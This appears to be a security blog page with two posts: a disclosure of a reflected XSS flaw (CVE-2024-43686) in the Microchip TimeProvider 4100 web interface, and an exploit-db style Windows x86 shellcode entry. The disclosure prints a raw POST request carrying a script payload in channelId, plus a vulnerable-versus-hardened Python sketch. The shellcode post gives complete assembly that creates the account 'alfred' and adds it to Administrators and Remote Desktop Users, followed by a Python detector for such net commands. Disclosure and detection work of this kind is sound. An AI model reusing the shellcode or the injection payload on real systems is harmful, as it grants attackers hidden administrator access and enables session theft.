Tuesday, October 08, 2024

CVE-2024-43686 - MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING (XSS)


This issue was found while examining the administrative web interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device.

TimeProvider 4100 Grandmaster Device

One parameter in particular, channelId, was reflected unmodified in the responses of the embedded web server. Specifically, this happens in the request that updates the performance charts.

Continuing along this path, after several attempts it was possible to inject a JavaScript payload between <script> tags, resulting in a reflected cross-site scripting vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:

Request RAW:

POST /get_chart_data HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: https://XXX.XXX.XXX.XXX
Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd


Payload execution on the victim’s browser:

Conclusion:


An unauthenticated user can insert JavaScript snippets in the channelId parameter of the specified POST request to the web resource get_chart_data. In the worst case, attackers will be able to perform privileged operations by stealing the administrative user’s session, or gain access to sensitive information belonging to that user.
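Added example, not code from the post or from the vendor's firmware: a Python sketch of the flaw described above (channelId concatenated straight into a <script> block) next to a hardened handler that whitelists channelId as a small integer and, where a value must reach a JavaScript context, JSON-encodes it and neutralises "</". The response template and the handler names are constructed for illustration; the device's real response is not shown on this page.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample body, with the same shape as the request quoted above.
SAMPLE_BODY = ("metric=mtie_a&xRange=1&tStart=-1&channelName=span"
               "&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd")


def render_vulnerable(body: str) -> str:
    """Mirrors the flaw: the raw parameter lands inside a <script> element."""
    params = parse_qs(body)
    channel_id = params.get("channelId", [""])[0]
    return f"<script>var channelId = '{channel_id}';</script>"


def parse_channel_id(raw: str) -> int:
    """Whitelist validation: the chart endpoint only needs a small integer."""
    if not re.fullmatch(r"\d{1,4}", raw):
        raise ValueError(f"invalid channelId: {raw!r}")
    return int(raw)


def js_string_literal(value) -> str:
    """JSON-encode for a JavaScript context and escape '</' so the value
    can never close the enclosing <script> element."""
    return json.dumps(value).replace("</", "<\\/")


def render_hardened(body: str) -> str:
    """Rejects anything that is not a plain channel number (constructed handler)."""
    params = parse_qs(body)
    raw = params.get("channelId", [""])[0]
    try:
        channel_id = parse_channel_id(raw)
    except ValueError:
        return "HTTP 400 Bad Request"
    return f"<script>var channelId = {js_string_literal(channel_id)};</script>"


def contains_script_breakout(html: str) -> bool:
    """Response check: more than one <script opener means user data broke out."""
    return html.lower().count("<script") > 1
```

Running render_vulnerable on SAMPLE_BODY reproduces the breakout, while render_hardened answers the same body with a 400 and only ever emits the integer form.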


Reporting Information:


CVE Identifier: CVE-2024-43686
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.




Wednesday, February 24, 2021

Shellcode - Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group (240 bytes)


Author: Armando Huesca Prida

Summary: 

Windows x86 shellcode that uses the CreateProcessA Windows API to add a new user to the Administrators and Remote Desktop Users groups. This shellcode uses the JMP/CALL/POP technique and static kernel32.dll function addresses.

Bad characters in the message db string can be avoided by switching letters between uppercase and lowercase (Windows paths and commands are case-insensitive).
Exploitdb publication: shellcode
Shellcode information:
# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 20-02-2021
#
# Tested on:
# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
Shellcode considerations:

- Function address of CreateProcessA in kernel32.dll: 0x77082082
- Function address of ExitProcess in kernel32.dll: 0x770d214f
- Administrator user credentials: alfred:test
- Size of the message db parameter: 152 bytes -> 0x98 hex, computed as 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)

Assembly shellcode:

global _start
section .text

_start:

jmp application

firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al                       ; size of message db parameter

StartUpInfoANDProcessInformation:
push eax                                ; hStderror null in this case
push eax                                ; hStdOutput, null
push eax                                ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12                            ; 18 times loop to fill both structures.

looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101            ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44               ; cb = 0x44 (sizeof STARTUPINFOA)
lea eax, [esp+0x10]                     ; eax points to StartUpInfo

        ; eax holds a pointer to StartUPinfo
        ; esp holds a pointer to Process_Info filled of null values

createprocessA:
push esp                                ; pointer to Process-Info
push eax                                ; pointer to StartUpInfo
xor ebx, ebx
push ebx                                ; null
push ebx                                ; null
push ebx                                ; null
inc ebx
push ebx                                ; bInheritHandles = TRUE
dec ebx
push ebx                                ; null
push ebx                                ; null
push edi                                ; pointer to message db string

push ebx                                ; null
mov edx, 0x77082082                     ; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:

push eax                                ; createprocessA return in eax
mov edx, 0x770d214f                     ; ExitProcess addr in kernel32.dll
call edx

application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'
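Added example, not part of the exploit-db entry: a defender-side pass over constructed Sysmon Event ID 1 style process-creation records that scores the pattern this shellcode produces, an account created and promoted into Administrators or Remote Desktop Users within one command line. The records, field names and threshold are constructed assumptions for illustration.

```python
import re

# Constructed sample records, not captured from a real host.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Users\\victim\\Desktop\\vulnerable.exe",
     "CommandLine": ('c:\\windows\\system32\\cmd.exe /c net user alfred test /add '
                     '& net localgroup ADMINISTRATORS alfred /add '
                     '& net localgroup "Remote Desktop Users" alfred /add')},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c net localgroup Administrators"},
    {"Image": "C:\\Windows\\System32\\net.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "net user alice /add"},
]

PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}

# "net user <name> [password] /add" via net.exe or net1.exe, case-insensitive.
USER_ADD = re.compile(r"\bnet1?\s+user\s+(\S+)\s+\S*\s*/add\b", re.I)
# "net localgroup <group or "quoted group"> <name> /add"
GROUP_ADD = re.compile(r'\bnet1?\s+localgroup\s+("[^"]+"|\S+)\s+(\S+)\s+/add\b', re.I)


def analyse_command_line(cmd: str) -> dict:
    """Extracts accounts created and (group, account) pairs added by one command line."""
    users = {m.group(1).lower() for m in USER_ADD.finditer(cmd)}
    groups = {(g.strip('"').lower(), u.lower()) for g, u in GROUP_ADD.findall(cmd)}
    return {"users_created": users, "group_adds": groups}


def score_event(event: dict) -> int:
    """Additive score: +1 per account creation, +1 per privileged group add,
    +3 when the same account is created and promoted in a single command line."""
    facts = analyse_command_line(event["CommandLine"])
    score = 1 if facts["users_created"] else 0
    privileged = {(g, u) for g, u in facts["group_adds"] if g in PRIVILEGED_GROUPS}
    score += len(privileged)
    if any(u in facts["users_created"] for _, u in privileged):
        score += 3
    return score


def alerts(events, threshold: int = 3) -> list:
    """Returns the records whose score reaches the (constructed) alert threshold."""
    return [e for e in events if score_event(e) >= threshold]
```

The whole chain arrives in the cmd.exe record because the shellcode hands a single command line to CreateProcessA, which is why the scoring works on the parent command line rather than on the individual net.exe children.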